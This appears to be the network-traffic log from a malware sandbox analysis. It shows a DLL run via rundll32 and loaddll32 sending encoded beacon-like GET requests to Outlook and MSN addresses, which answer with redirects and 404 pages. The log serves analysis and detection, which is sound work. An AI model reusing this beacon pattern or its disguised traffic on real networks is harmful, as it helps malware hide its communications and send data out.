                                                                                                                                                                      2021-10-11 20:38:20 UTC18OUTGET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: outlook.com
                                                                                                                                                                      2021-10-11 20:38:20 UTC19INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Location: https://www.outlook.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre
                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                      request-id: 1ab8e1f4-4386-e5ac-c3ff-9b366d219903
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      X-FEServer: MWHPR11CA0025
                                                                                                                                                                      X-RequestId: 31bda99b-9d4b-4a70-8929-0597b0921e1f
                                                                                                                                                                      MS-CV: 9OG4GoZDrOXD/5s2bSGZAw.0
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      X-FEServer: MWHPR11CA0025
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:38:20 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      14192.168.2.74984652.97.219.162443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:38:21 UTC19OUTGET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: www.outlook.com
                                                                                                                                                                      2021-10-11 20:38:21 UTC20INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Location: https://outlook.office365.com/signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre
                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                      request-id: 15294223-cf17-390d-9f43-65caa9090b20
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      X-FEServer: AS8PR04CA0054
                                                                                                                                                                      X-RequestId: 80f5dae1-9e15-4b93-a003-4ac2eda6c736
                                                                                                                                                                      MS-CV: I0IpFRfPDTmfQ2XKqQkLIA.0
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      X-FEServer: AS8PR04CA0054
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:38:20 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      15192.168.2.74984752.98.214.82443C:\Windows\System32\loaddll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:38:21 UTC21OUTGET /signup/liopolo/bJlCFRYLHvFIRqYTrU/8RRkttIEA/t1_2BP9O_2BAm85KU_2B/aSpxz3oD7DS4GgXePzf/ia7vS0WgwZtA22jtnk2sgM/8aNHELsXc5Ipi/BMZNGN2v/65JiDOn3VthO9IJqFpTTW9Q/9POmMR2_2B/F79Rk5g05Py2gD_2B/JwjLpqa35mrg/bt4uvVPD_2F/UqHQdzYFCQmMXc/ZX0Xxi4W.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: outlook.office365.com
                                                                                                                                                                      2021-10-11 20:38:21 UTC21INHTTP/1.1 404 Not Found
                                                                                                                                                                      Content-Length: 1245
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                      request-id: 295ac203-bc6e-2f15-84bf-9c5b1de6eb11
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      X-CalculatedFETarget: AM9P193CU001.internal.outlook.com
                                                                                                                                                                      X-BackEndHttpStatus: 404
                                                                                                                                                                      X-FEProxyInfo: AM9P193CA0023.EURP193.PROD.OUTLOOK.COM
                                                                                                                                                                      X-CalculatedBETarget: AM0PR05MB4915.eurprd05.prod.outlook.com
                                                                                                                                                                      X-BackEndHttpStatus: 404
                                                                                                                                                                      X-RUM-Validated: 1
                                                                                                                                                                      X-Proxy-RoutingCorrectness: 1
                                                                                                                                                                      X-Proxy-BackendServerStatus: 404
                                                                                                                                                                      MS-CV: A8JaKW68FS+Ev5xbHebrEQ.1.1
                                                                                                                                                                      X-FEServer: AM9P193CA0023
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      X-FEServer: AS9PR05CA0054
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:38:20 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2021-10-11 20:38:21 UTC22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      2192.168.2.74977140.97.161.50443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:36:54 UTC2OUTGET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: outlook.com
                                                                                                                                                                      2021-10-11 20:36:54 UTC3INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Location: https://www.outlook.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre
                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                      request-id: 0acc84ba-0f33-73c7-d697-d3bbddfdc093
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      X-FEServer: MWHPR11CA0045
                                                                                                                                                                      X-RequestId: 7a31cf66-1cf5-44d5-8e06-3f842ed018cd
                                                                                                                                                                      MS-CV: uoTMCjMPx3PWl9O73f3Akw.0
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      X-FEServer: MWHPR11CA0045
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:36:54 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      3192.168.2.74977240.101.124.210443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:36:54 UTC3OUTGET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: www.outlook.com
                                                                                                                                                                      2021-10-11 20:36:54 UTC4INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Location: https://outlook.office365.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre
                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                      request-id: eb0f8648-c510-3723-7432-6444c8b36785
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      X-FEServer: AM5PR1001CA0044
                                                                                                                                                                      X-RequestId: 8aef651c-1dd5-41ea-8e75-391015b5d07d
                                                                                                                                                                      MS-CV: SIYP6xDFIzd0MmREyLNnhQ.0
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      X-FEServer: AM5PR1001CA0044
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:36:54 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      4192.168.2.74977352.97.223.66443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:36:54 UTC5OUTGET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: outlook.office365.com
                                                                                                                                                                      2021-10-11 20:36:54 UTC5INHTTP/1.1 404 Not Found
                                                                                                                                                                      Content-Length: 1245
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                      request-id: 65c8d4ee-587b-c9b1-e6a8-2fcf099847ce
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      X-CalculatedBETarget: AM6PR04MB5622.EURPRD04.PROD.OUTLOOK.COM
                                                                                                                                                                      X-BackEndHttpStatus: 404
                                                                                                                                                                      X-Proxy-RoutingCorrectness: 1
                                                                                                                                                                      X-Proxy-BackendServerStatus: 404
                                                                                                                                                                      MS-CV: 7tTIZXtYscnmqC/PCZhHzg.1
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      X-FEServer: AS8PR04CA0145
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:36:54 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2021-10-11 20:36:54 UTC5INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      5192.168.2.74977440.97.161.50443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:36:58 UTC7OUTGET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: outlook.com
                                                                                                                                                                      2021-10-11 20:36:58 UTC7INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Location: https://www.outlook.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre
                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                      request-id: ddf68228-86cb-32a7-86de-6ed9e1d98ba3
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      X-FEServer: MWHPR11CA0040
                                                                                                                                                                      X-RequestId: 87e81b68-f9ec-4d48-b672-c8ec8b40ec82
                                                                                                                                                                      MS-CV: KIL23cuGpzKG3m7Z4dmLow.0
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      X-FEServer: MWHPR11CA0040
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:36:57 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      6192.168.2.74977540.101.124.210443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:36:58 UTC8OUTGET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: www.outlook.com
                                                                                                                                                                      2021-10-11 20:36:59 UTC8INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Location: https://outlook.office365.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre
                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                      request-id: 0d2a2de0-5fed-0dd6-92ba-8fd4ebe6ac98
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      X-FEServer: AM5PR1001CA0057
                                                                                                                                                                      X-RequestId: e00e3198-adde-4934-b834-ed1ee1f1dc71
                                                                                                                                                                      MS-CV: 4C0qDe1f1g2Suo/U6+asmA.0
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      X-FEServer: AM5PR1001CA0057
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:36:58 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      7192.168.2.74977652.98.208.114443C:\Windows\System32\loaddll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:36:59 UTC9OUTGET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: outlook.office365.com
                                                                                                                                                                      2021-10-11 20:36:59 UTC9INHTTP/1.1 404 Not Found
                                                                                                                                                                      Content-Length: 1245
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                      request-id: 4b4aee2f-6f98-79c7-950f-5c79da77b3fe
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      X-CalculatedBETarget: AM6PR06MB4263.eurprd06.prod.outlook.com
                                                                                                                                                                      X-BackEndHttpStatus: 404
                                                                                                                                                                      X-Proxy-RoutingCorrectness: 1
                                                                                                                                                                      X-Proxy-BackendServerStatus: 404
                                                                                                                                                                      MS-CV: L+5KS5hvx3mVD1x52nez/g.1
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      X-FEServer: AS9PR06CA0128
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:36:58 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2021-10-11 20:36:59 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      8192.168.2.74981013.82.28.61443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      2021-10-11 20:37:36 UTC11OUTGET /mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/MnijqTPatYoqwLU2Gjp/CUGc0n_2BeItdu5kr8poMa/AhSBnyUxBLy2z/WL6kh9Er/V_2FntCaBAYN2Q0pmQz73pS/plPX31iyVH/sliN48qRh7bzwYOXL/_2Bf1goPp5sf/LxXLhBSZnu3/MQi2YcecwkM/9zZah40u0/3pu.jre HTTP/1.1
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                                                                      Host: msn.com
                                                                                                                                                                      2021-10-11 20:37:36 UTC11INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Location: https://www.msn.com/mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/MnijqTPatYoqwLU2Gjp/CUGc0n_2BeItdu5kr8poMa/AhSBnyUxBLy2z/WL6kh9Er/V_2FntCaBAYN2Q0pmQz73pS/plPX31iyVH/sliN48qRh7bzwYOXL/_2Bf1goPp5sf/LxXLhBSZnu3/MQi2YcecwkM/9zZah40u0/3pu.jre
                                                                                                                                                                      Server: Microsoft-IIS/8.5
                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                      Date: Mon, 11 Oct 2021 20:37:35 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 395
                                                                                                                                                                      2021-10-11 20:37:36 UTC12INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 42 71 51 56 4f 62 7a 38 67 35 6c 6e 6f 63 4c 2f 72 44 6d 50 31 4e 38 54 54 7a 76 68 59 37 76 70 36 4e 2f 52 53 36 48 36 78 4d 55 75 2f 71 41 31 43 66 4a 39 6f 44 6e 51 68 52 55 59 44 47 67 79 75 2f 4d 6e 69 6a 71 54 50 61 74 59 6f 71 77 4c 55 32 47 6a 70 2f 43 55 47 63 30 6e 5f 32 42 65 49 74 64 75 35 6b 72 38 70 6f 4d 61 2f 41 68 53 42 6e 79 55
                                                                                                                                                                      Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/MnijqTPatYoqwLU2Gjp/CUGc0n_2BeItdu5kr8poMa/AhSBnyU


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      9192.168.2.74981213.82.28.61443C:\Windows\SysWOW64\rundll32.exe
